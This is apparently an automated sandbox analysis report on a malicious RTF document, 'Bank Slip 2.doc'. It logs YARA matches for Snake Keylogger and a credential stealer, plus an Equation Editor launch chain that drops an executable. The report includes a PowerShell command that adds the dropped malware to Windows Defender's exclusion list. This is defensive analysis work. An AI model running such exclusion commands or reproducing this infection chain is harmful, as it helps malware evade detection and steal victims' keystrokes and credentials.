            Source: C:\Users\user\AppData\Roaming\obie8920193.exeCode function: 7_2_00575E587_2_00575E58
            Source: C:\Users\user\AppData\Roaming\obie8920193.exeCode function: 7_2_0057F4607_2_0057F460
            Source: C:\Users\user\AppData\Roaming\obie8920193.exeCode function: 7_2_0057EE107_2_0057EE10
            Source: C:\Users\user\AppData\Roaming\obie8920193.exeCode function: 7_2_0057D4E07_2_0057D4E0
            Source: C:\Users\user\AppData\Roaming\obie8920193.exeCode function: 7_2_0057E1787_2_0057E178
            Source: C:\Users\user\AppData\Roaming\obie8920193.exeCode function: 7_2_0057DB307_2_0057DB30
            Source: C:\Users\user\AppData\Roaming\obie8920193.exeCode function: 7_2_0057E7C07_2_0057E7C0
            Source: C:\Users\user\AppData\Roaming\obie8920193.exeCode function: 7_2_005794597_2_00579459
            Source: C:\Users\user\AppData\Roaming\obie8920193.exeCode function: 7_2_005744487_2_00574448
            Source: C:\Users\user\AppData\Roaming\obie8920193.exeCode function: 7_2_0057AA487_2_0057AA48
            Source: C:\Users\user\AppData\Roaming\obie8920193.exeCode function: 7_2_005714717_2_00571471
            Source: C:\Users\user\AppData\Roaming\obie8920193.exeCode function: 7_2_005794687_2_00579468
            Source: C:\Users\user\AppData\Roaming\obie8920193.exeCode function: 7_2_00577A107_2_00577A10
            Source: C:\Users\user\AppData\Roaming\obie8920193.exeCode function: 7_2_005710187_2_00571018
            Source: C:\Users\user\AppData\Roaming\obie8920193.exeCode function: 7_2_00575A007_2_00575A00
            Source: C:\Users\user\AppData\Roaming\obie8920193.exeCode function: 7_2_0057443E7_2_0057443E
            Source: C:\Users\user\AppData\Roaming\obie8920193.exeCode function: 7_2_00572A387_2_00572A38
            Source: C:\Users\user\AppData\Roaming\obie8920193.exeCode function: 7_2_0057AA387_2_0057AA38
            Source: C:\Users\user\AppData\Roaming\obie8920193.exeCode function: 7_2_005710287_2_00571028
            Source: C:\Users\user\AppData\Roaming\obie8920193.exeCode function: 7_2_0057C0287_2_0057C028
            Source: C:\Users\user\AppData\Roaming\obie8920193.exeCode function: 7_2_00572A287_2_00572A28
            Source: C:\Users\user\AppData\Roaming\obie8920193.exeCode function: 7_2_005732D97_2_005732D9
            Source: C:\Users\user\AppData\Roaming\obie8920193.exeCode function: 7_2_005718D87_2_005718D8
            Source: C:\Users\user\AppData\Roaming\obie8920193.exeCode function: 7_2_0057C8D87_2_0057C8D8
            Source: C:\Users\user\AppData\Roaming\obie8920193.exeCode function: 7_2_005718C97_2_005718C9
            Source: C:\Users\user\AppData\Roaming\obie8920193.exeCode function: 7_2_00576CC87_2_00576CC8
            Source: C:\Users\user\AppData\Roaming\obie8920193.exeCode function: 7_2_00574CF87_2_00574CF8
            Source: C:\Users\user\AppData\Roaming\obie8920193.exeCode function: 7_2_00574CEA7_2_00574CEA
            Source: C:\Users\user\AppData\Roaming\obie8920193.exeCode function: 7_2_005732E87_2_005732E8
            Source: C:\Users\user\AppData\Roaming\obie8920193.exeCode function: 7_2_005798E87_2_005798E8
            Source: C:\Users\user\AppData\Roaming\obie8920193.exeCode function: 7_2_00572E907_2_00572E90
            Source: C:\Users\user\AppData\Roaming\obie8920193.exeCode function: 7_2_005748907_2_00574890
            Source: C:\Users\user\AppData\Roaming\obie8920193.exeCode function: 7_2_0057AE907_2_0057AE90
            Source: C:\Users\user\AppData\Roaming\obie8920193.exeCode function: 7_2_005776987_2_00577698
            Source: C:\Users\user\AppData\Roaming\obie8920193.exeCode function: 7_2_00572E817_2_00572E81
            Source: C:\Users\user\AppData\Roaming\obie8920193.exeCode function: 7_2_005714807_2_00571480
            Source: C:\Users\user\AppData\Roaming\obie8920193.exeCode function: 7_2_0057C4807_2_0057C480
            Source: C:\Users\user\AppData\Roaming\obie8920193.exeCode function: 7_2_00576CBC7_2_00576CBC
            Source: C:\Users\user\AppData\Roaming\obie8920193.exeCode function: 7_2_005748A07_2_005748A0
            Source: C:\Users\user\AppData\Roaming\obie8920193.exeCode function: 7_2_0057AEA07_2_0057AEA0
            Source: C:\Users\user\AppData\Roaming\obie8920193.exeCode function: 7_2_005751507_2_00575150
            Source: C:\Users\user\AppData\Roaming\obie8920193.exeCode function: 7_2_005737407_2_00573740
            Source: C:\Users\user\AppData\Roaming\obie8920193.exeCode function: 7_2_00579D407_2_00579D40
            Source: C:\Users\user\AppData\Roaming\obie8920193.exeCode function: 7_2_005751407_2_00575140
            Source: C:\Users\user\AppData\Roaming\obie8920193.exeCode function: 7_2_005707787_2_00570778
            Source: C:\Users\user\AppData\Roaming\obie8920193.exeCode function: 7_2_0057B7787_2_0057B778
            Source: C:\Users\user\AppData\Roaming\obie8920193.exeCode function: 7_2_005721787_2_00572178
            Source: C:\Users\user\AppData\Roaming\obie8920193.exeCode function: 7_2_0057B7677_2_0057B767
            Source: C:\Users\user\AppData\Roaming\obie8920193.exeCode function: 7_2_005707687_2_00570768
            Source: C:\Users\user\AppData\Roaming\obie8920193.exeCode function: 7_2_0057B3117_2_0057B311
            Source: C:\Users\user\AppData\Roaming\obie8920193.exeCode function: 7_2_005703107_2_00570310
            Source: C:\Users\user\AppData\Roaming\obie8920193.exeCode function: 7_2_005787087_2_00578708
            Source: C:\Users\user\AppData\Roaming\obie8920193.exeCode function: 7_2_005737327_2_00573732
            Source: C:\Users\user\AppData\Roaming\obie8920193.exeCode function: 7_2_00571D307_2_00571D30
            Source: C:\Users\user\AppData\Roaming\obie8920193.exeCode function: 7_2_005703207_2_00570320
            Source: C:\Users\user\AppData\Roaming\obie8920193.exeCode function: 7_2_0057B3207_2_0057B320
            Source: C:\Users\user\AppData\Roaming\obie8920193.exeCode function: 7_2_00571D207_2_00571D20
            Source: C:\Users\user\AppData\Roaming\obie8920193.exeCode function: 7_2_005725D17_2_005725D1
            Source: C:\Users\user\AppData\Roaming\obie8920193.exeCode function: 7_2_00570BD07_2_00570BD0
            Source: C:\Users\user\AppData\Roaming\obie8920193.exeCode function: 7_2_0057BBD07_2_0057BBD0
            Source: C:\Users\user\AppData\Roaming\obie8920193.exeCode function: 7_2_00570BC27_2_00570BC2
            Source: C:\Users\user\AppData\Roaming\obie8920193.exeCode function: 7_2_0057BBC17_2_0057BBC1
            Source: C:\Users\user\AppData\Roaming\obie8920193.exeCode function: 7_2_005759F27_2_005759F2
            Source: C:\Users\user\AppData\Roaming\obie8920193.exeCode function: 7_2_00573FF07_2_00573FF0
            Source: C:\Users\user\AppData\Roaming\obie8920193.exeCode function: 7_2_0057A5F07_2_0057A5F0
            Source: C:\Users\user\AppData\Roaming\obie8920193.exeCode function: 7_2_0057A5E17_2_0057A5E1
            Source: C:\Users\user\AppData\Roaming\obie8920193.exeCode function: 7_2_005725E07_2_005725E0
            Source: C:\Users\user\AppData\Roaming\obie8920193.exeCode function: 7_2_00573FEA7_2_00573FEA
            Source: C:\Users\user\AppData\Roaming\obie8920193.exeCode function: 7_2_00573B987_2_00573B98
            Source: C:\Users\user\AppData\Roaming\obie8920193.exeCode function: 7_2_0057A1987_2_0057A198
            Source: C:\Users\user\AppData\Roaming\obie8920193.exeCode function: 7_2_005755987_2_00575598
            Source: C:\Users\user\AppData\Roaming\obie8920193.exeCode function: 7_2_005721887_2_00572188
            Source: C:\Users\user\AppData\Roaming\obie8920193.exeCode function: 7_2_00573B887_2_00573B88
            Source: C:\Users\user\AppData\Roaming\obie8920193.exeCode function: 7_2_0057A1887_2_0057A188
            Source: C:\Users\user\AppData\Roaming\obie8920193.exeCode function: 7_2_005755A87_2_005755A8
            Source: C:\Users\user\AppData\Roaming\obie8920193.exeCode function: 7_2_006900407_2_00690040
            Source: C:\Users\user\AppData\Roaming\obie8920193.exeCode function: 7_2_00690CD87_2_00690CD8
            Source: C:\Users\user\AppData\Roaming\obie8920193.exeCode function: 7_2_006906907_2_00690690
            Source: C:\Users\user\AppData\Roaming\obie8920193.exeCode function: 7_2_006900067_2_00690006
            Source: Bank Slip 2.doc, type: SAMPLEMatched rule: INDICATOR_RTF_MalVer_Objects author = ditekSHen, description = Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents.
            Source: 5.2.obie8920193.exe.3599d70.8.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: 5.2.obie8920193.exe.3599d70.8.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
            Source: 5.2.obie8920193.exe.3599d70.8.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
            Source: 5.2.obie8920193.exe.3599d70.8.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
            Source: 5.2.obie8920193.exe.3579550.10.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: 5.2.obie8920193.exe.3579550.10.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
            Source: 5.2.obie8920193.exe.3579550.10.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
            Source: 5.2.obie8920193.exe.3579550.10.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
            Source: 7.2.obie8920193.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: 7.2.obie8920193.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
            Source: 7.2.obie8920193.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
            Source: 7.2.obie8920193.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
            Source: 5.2.obie8920193.exe.3599d70.8.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: 5.2.obie8920193.exe.3599d70.8.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
            Source: 5.2.obie8920193.exe.3599d70.8.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
            Source: 5.2.obie8920193.exe.3599d70.8.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
            Source: 5.2.obie8920193.exe.3579550.10.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: 5.2.obie8920193.exe.3579550.10.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
            Source: 5.2.obie8920193.exe.3579550.10.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
            Source: 5.2.obie8920193.exe.3579550.10.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
            Source: 00000007.00000002.864143938.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: 00000007.00000002.864143938.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
            Source: 00000005.00000002.366574375.0000000003579000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: 00000005.00000002.366574375.0000000003579000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
            Source: Process Memory Space: obie8920193.exe PID: 3152, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: Process Memory Space: obie8920193.exe PID: 3152, type: MEMORYSTRMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
            Source: Process Memory Space: obie8920193.exe PID: 3244, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: Process Memory Space: obie8920193.exe PID: 3244, type: MEMORYSTRMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
            Source: FcdBUj68lnCbMtB[1].exe.2.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: obie8920193.exe.2.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: 5.2.obie8920193.exe.3599d70.8.raw.unpack, zi--.csCryptographic APIs: 'TransformFinalBlock'
            Source: 5.2.obie8920193.exe.3599d70.8.raw.unpack, zi--.csCryptographic APIs: 'TransformFinalBlock'
            Source: 5.2.obie8920193.exe.3599d70.8.raw.unpack, ----.csCryptographic APIs: 'TransformFinalBlock'
            Source: 5.2.obie8920193.exe.3599d70.8.raw.unpack, ----.csCryptographic APIs: 'TransformFinalBlock'
            Source: 5.2.obie8920193.exe.3579550.10.raw.unpack, zi--.csCryptographic APIs: 'TransformFinalBlock'
            Source: 5.2.obie8920193.exe.3579550.10.raw.unpack, zi--.csCryptographic APIs: 'TransformFinalBlock'
            Source: 5.2.obie8920193.exe.3579550.10.raw.unpack, ----.csCryptographic APIs: 'TransformFinalBlock'
            Source: 5.2.obie8920193.exe.3579550.10.raw.unpack, ----.csCryptographic APIs: 'TransformFinalBlock'
            Source: 5.2.obie8920193.exe.38e9930.9.raw.unpack, W69GQbvchlGWfxEUg3.csSecurity API names: _0020.SetAccessControl
            Source: 5.2.obie8920193.exe.38e9930.9.raw.unpack, W69GQbvchlGWfxEUg3.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 5.2.obie8920193.exe.38e9930.9.raw.unpack, W69GQbvchlGWfxEUg3.csSecurity API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
            Source: 5.2.obie8920193.exe.4ea0000.12.raw.unpack, W69GQbvchlGWfxEUg3.csSecurity API names: _0020.SetAccessControl
            Source: 5.2.obie8920193.exe.4ea0000.12.raw.unpack, W69GQbvchlGWfxEUg3.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 5.2.obie8920193.exe.4ea0000.12.raw.unpack, W69GQbvchlGWfxEUg3.csSecurity API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
            Source: 5.2.obie8920193.exe.38e9930.9.raw.unpack, BR4r9SHUAmvVNPGE5t.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 5.2.obie8920193.exe.4ea0000.12.raw.unpack, BR4r9SHUAmvVNPGE5t.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 5.2.obie8920193.exe.3887310.11.raw.unpack, BR4r9SHUAmvVNPGE5t.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 5.2.obie8920193.exe.3887310.11.raw.unpack, W69GQbvchlGWfxEUg3.csSecurity API names: _0020.SetAccessControl
            Source: 5.2.obie8920193.exe.3887310.11.raw.unpack, W69GQbvchlGWfxEUg3.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 5.2.obie8920193.exe.3887310.11.raw.unpack, W69GQbvchlGWfxEUg3.csSecurity API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
            Source: 5.2.obie8920193.exe.4c0000.2.raw.unpack, ReactionVessel.csSuspicious method names: .ReactionVessel.Inject
            Source: 5.2.obie8920193.exe.2734d44.5.raw.unpack, ReactionVessel.csSuspicious method names: .ReactionVessel.Inject
            Source: 5.2.obie8920193.exe.2755f14.7.raw.unpack, ReactionVessel.csSuspicious method names: .ReactionVessel.Inject
            Source: classification engineClassification label: mal100.troj.spyw.expl.evad.winDOC@9/14@25/5
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\Desktop\~$nk Slip 2.docJump to behavior
            Source: C:\Users\user\AppData\Roaming\obie8920193.exeMutant created: NULL
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Temp\CVR737A.tmpJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................L.......a..........................s............................................Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................L.......m..........................s............................................Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................L..................................s............................../.............Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................L..................................s............................................Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................L..................................s............................../.............Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................L..................................s............................................Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................a.g.a.i.n.......................L..................................s............................../.............Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................L..................................s............................../.............Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................A.t. .l.i.n.e.:.1. .c.h.a.r.:.1.L..................................s.................... ........./.............Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................L..................................s............................../.............Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................L..................................s............................../.............Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................L..................................s............................................Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................+. .~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~................................s....................$........./.............Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................L.......!..........................s............................../.............Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................L.......3..........................s............................../.............Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................L.......?..........................s............................................Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ . . .m.m.a.n.d.N.o.t.F.o.u.n.d.E.x.c.e.p.t.i.o.n..................s....................2........./.............Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................L.......]..........................s............................../.............Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................L.......o..........................s....................l........./.............Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................L.......{..........................s............................................Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ .......(.P.....................L..................................s............................../.............Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................L..................................s............................../.............Jump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile read: C:\Users\desktop.iniJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Users\user\AppData\Roaming\obie8920193.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Users\user\AppData\Roaming\obie8920193.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Users\user\AppData\Roaming\obie8920193.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Users\user\AppData\Roaming\obie8920193.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Users\user\AppData\Roaming\obie8920193.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Users\user\AppData\Roaming\obie8920193.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Users\user\AppData\Roaming\obie8920193.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Users\user\AppData\Roaming\obie8920193.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Users\user\AppData\Roaming\obie8920193.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Users\user\AppData\Roaming\obie8920193.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Users\user\AppData\Roaming\obie8920193.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Users\user\AppData\Roaming\obie8920193.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Users\user\AppData\Roaming\obie8920193.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Users\user\AppData\Roaming\obie8920193.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Users\user\AppData\Roaming\obie8920193.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Users\user\AppData\Roaming\obie8920193.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Users\user\AppData\Roaming\obie8920193.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Users\user\AppData\Roaming\obie8920193.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Users\user\AppData\Roaming\obie8920193.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Users\user\AppData\Roaming\obie8920193.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Users\user\AppData\Roaming\obie8920193.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: Bank Slip 2.docReversingLabs: Detection: 39%
            Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Roaming\obie8920193.exe "C:\Users\user\AppData\Roaming\obie8920193.exe"
            Source: C:\Users\user\AppData\Roaming\obie8920193.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\obie8920193.exe"
